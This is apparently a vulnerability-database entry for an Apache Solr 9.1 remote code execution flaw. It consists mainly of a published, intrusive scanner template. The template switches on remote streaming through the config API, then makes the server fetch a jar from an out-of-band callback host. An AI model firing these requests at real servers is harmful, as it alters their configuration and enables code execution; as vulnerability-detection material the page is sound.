apache-solr-rce: Apache Solr 9.1 - Remote Code Execution

日期: 2025-08-01 | 影响软件: Apache Solr | POC: 已公开

漏洞描述

Apache Solr 9.1 is vulnerable to RCE.

PoC代码[已公开]

id: apache-solr-rce

info:
  name: Apache Solr 9.1 - Remote Code Execution
  author: j4vaovo
  severity: critical
  description: Apache Solr 9.1 is vulnerable to RCE.
  reference:
    - https://web.archive.org/web/20230414152023/https://noahblog.360.cn/apache-solr-rce/
  metadata:
    max-request: 2
  tags: solr,apache,rce,oast,intrusive,vuln

http:
  - raw:
      - |
        POST /solr/gettingstarted_shard1_replica_n1/config HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {  "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
      - |
        POST /solr/gettingstarted_shard2_replica_n1/debug/dump?param=ContentStreams HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------5897997e44b07bf9

        --------------------------5897997e44b07bf9
        Content-Disposition: form-data; name="stream.url"

        jar:http://{{interactsh-url}}/test.jar?!/Test.class
        --------------------------5897997e44b07bf9--

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"
# digest: 4b0a00483046022100d7d4fd55c84e22f59b54ad48eab95a5efd282ba48f6abab2310bd80116fe01ae022100a9e287b1dc51fd89d9764fe4384f9e75116d8915822b91b941582b3fcd524f08:922c64590222798bb761d5b6d8e72950

相关漏洞推荐